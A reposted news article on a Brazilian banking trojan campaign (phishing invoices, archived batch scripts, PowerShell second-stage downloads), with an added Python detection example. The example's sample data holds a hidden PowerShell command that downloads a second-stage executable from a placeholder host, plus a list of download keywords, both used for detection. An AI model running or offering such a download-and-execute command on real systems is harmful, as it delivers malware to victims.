
How a piece of Brazilian malware became a global cybercrime export

via TechRadar - All the latest technology news http://bit.ly/2HBchKc

Brazil holds a special place in popular consciousness. It evokes thoughts of sun-kissed beaches and dense, luscious jungle, as well as extreme violence and poverty. Very few people outside the industry, however, would associate it with a distinctly more modern phenomenon: cybercrime.

Brazil has been a major player in the global cybercrime landscape for over a decade now. Brazilian threat actors have been cited by a number of high-profile reports as engaging in a plethora of cybercriminal activity, taking aim mostly at high-yield targets in the financial industry. According to the Igarapé Institute, a Brazilian think-tank which engages with security and development issues, the country is ranked second worldwide in online banking fraud and financial malware. Brazilian hackers are known for running huge swathes of botnets, which send out phishing and spam emails and proliferate info-stealers and banking trojans.

But even by Brazil’s own exceptionally high cybercrime standards, what Cybereason uncovered during 2018 proved exceptional. Researching, monitoring and analysing Brazilian financial malware, we discovered that this piece of malware had legs: it had managed to spread across almost a dozen countries in South America, Portugal and Spain, targeting customers of more than 60 banks around the globe.

So how did Brazilian cybercriminals take this malware and unleash it on victims across the world? As with so many cybercrime campaigns, it started with a phish…

Infection

Cybereason found, unsurprisingly, that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first-stage payload is stored. The payloads involved often masquerade as Flash/Java updates.

Using a tactic which is popular in social engineering campaigns globally, the emails purport to be invoices (“FATURA” in Portuguese) in order to dupe victims into clicking and investigating further. Another common theme is spoofing emails to make them look like they came from VIVO, Brazil’s largest telecommunications company. These two hooks allow cybercriminals to target a significant number of potential victims with minimal effort, on the assumption that invoices and emails from VIVO are sent and received every day and so will not look out of the ordinary.

Once the PDF documents within these phishing emails are opened, they lead to a stream containing a shortened URL, which works to deflect antivirus detection. The shortened URL then resolves to a Dropbox (or other online storage service) URL hosting a ZIP archive that contains the first-stage downloader script. Another method led victims to a file-sharing website, where they were encouraged to download a ZIP file. Once users click on the file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload. Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicions the users have about the downloaded file and to distract them from what’s going on in the background.

Theft

In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, Cybereason’s researchers also observed other extensions, such as .exe (Windows executable) and .chm (compiled HTML), sent as email attachments. Once installed and past the antivirus gatekeepers, the malware begins to steal online banking data for the targeted banks, a list of which is embedded in the malware’s configuration. Although the malware was Brazilian in origin, some samples were written to target banks in Spanish-speaking countries across Europe and Latin America, including Chile, Bolivia, Argentina and Spain.

This combination of downloaders bundled in archives proved to be one of the biggest strengths of the campaign, as they were incredibly adept at bypassing antivirus software. Correspondingly, many of the analysed payloads had a low detection rate, ranging from 0 to 17 of 59 antivirus vendors.
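The delivery chain described in the Infection and Theft sections (an archive attachment carrying a .bat/.cmd/.lnk script, which spawns cmd.exe and powershell.exe to fetch a second stage while a browser is opened as a decoy) lends itself to two simple detections. The following is an added example written for this page, not Cybereason’s or TechRadar’s code: an attachment check that flags script or executable members inside .zip/.rar archives, and a process-lineage check over endpoint telemetry that looks for cmd.exe launching powershell.exe with a download-style command line. The sample attachment listing and process records are constructed for illustration; the `Proc` and `Attachment` record shapes and the `DOWNLOAD_RE` keyword list are assumptions, not a real product’s schema.

```python
"""Detection checks for the archive-plus-script delivery chain described above.

Added example for this page (not the original article's or Cybereason's code).
The telemetry records below are constructed sample data.
"""
from dataclasses import dataclass, field
import re

# Attachment extensions the article lists as the first-stage carriers.
SCRIPT_EXTS = {".bat", ".cmd", ".lnk", ".exe", ".chm"}
ARCHIVE_EXTS = {".zip", ".rar"}

# Assumed set of PowerShell download primitives worth flagging (not from the page).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I
)


def _ext(name: str) -> str:
    """Lower-cased extension of a file name, '' if it has none."""
    name = name.lower()
    i = name.rfind(".")
    return name[i:] if i >= 0 else ""


@dataclass
class Attachment:
    filename: str
    members: list = field(default_factory=list)  # archive listing, if it is an archive


def flag_attachment(att: Attachment) -> list:
    """Return the file names that should block or quarantine this attachment.

    A bare script/executable is flagged directly; for an archive, every member
    with a script/executable extension is returned (the article's .rar/.zip case).
    """
    if _ext(att.filename) in ARCHIVE_EXTS:
        return [m for m in att.members if _ext(m) in SCRIPT_EXTS]
    return [att.filename] if _ext(att.filename) in SCRIPT_EXTS else []


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def detect_download_chain(procs: list) -> list:
    """Alert on cmd.exe -> powershell.exe with a download-style command line.

    Also reports whether an Internet Explorer instance was started from the same
    lineage (a child or sibling of the cmd.exe), matching the decoy behaviour
    described in the article.
    """
    by_pid = {p.pid: p for p in procs}
    alerts = []
    for p in procs:
        if p.image.lower() != "powershell.exe":
            continue
        parent = by_pid.get(p.ppid)
        if parent is None or parent.image.lower() != "cmd.exe":
            continue
        if not DOWNLOAD_RE.search(p.cmdline):
            continue
        decoy = any(
            q.image.lower() == "iexplore.exe" and q.ppid in (parent.pid, parent.ppid)
            for q in procs
        )
        grandparent = by_pid.get(parent.ppid)
        chain = " > ".join(
            x.image for x in (grandparent, parent, p) if x is not None
        )
        alerts.append({"pid": p.pid, "chain": chain, "decoy_browser": decoy})
    return alerts


# Constructed sample telemetry: one malicious lineage, one benign cmd/powershell pair.
SAMPLE_PROCS = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "cmd.exe", r'cmd.exe /c "C:\Users\victim\Downloads\FATURA_0119.bat"'),
    Proc(201, 200, "powershell.exe",
         "powershell.exe -w hidden -c (New-Object Net.WebClient)"
         ".DownloadFile('http://example.invalid/stage2','%TEMP%\\s2.exe')"),
    Proc(202, 200, "iexplore.exe", "iexplore.exe https://www.adobe.com/"),  # decoy
    Proc(300, 100, "cmd.exe", "cmd.exe /c dir"),
    Proc(301, 300, "powershell.exe", "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    print(flag_attachment(Attachment("FATURA.zip", ["fatura.pdf", "fatura.bat"])))
    for alert in detect_download_chain(SAMPLE_PROCS):
        print(alert)
```

The attachment check deliberately inspects archive members rather than the outer file name, since the article’s point is that the archive wrapper is what gets the script past mail filters; the process check keys on parent/child lineage plus command-line content so a benign cmd.exe that happens to start PowerShell is not flagged.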

The Bigger Picture

Other Brazilian malware related to the samples analysed by Cybereason was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, offer an understanding of what the threat actors are after.

In addition to the banking Trojans targeting bank users, we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a serious concern since it poses a major risk to organizations worldwide. The malware contains features that leverage Outlook’s functions, like the ability to query victims’ contact lists. Threat actors usually use this information for spam campaigns but can also sell it on the dark market to other attackers who want information on an organization they’re planning to attack. 

Assaf Dahan, Senior Director and Head of Threat Hunting at Cybereason

https://technicalmukhtar.blogspot.com/2019/01/how-piece-of-brazilian-malware-became.html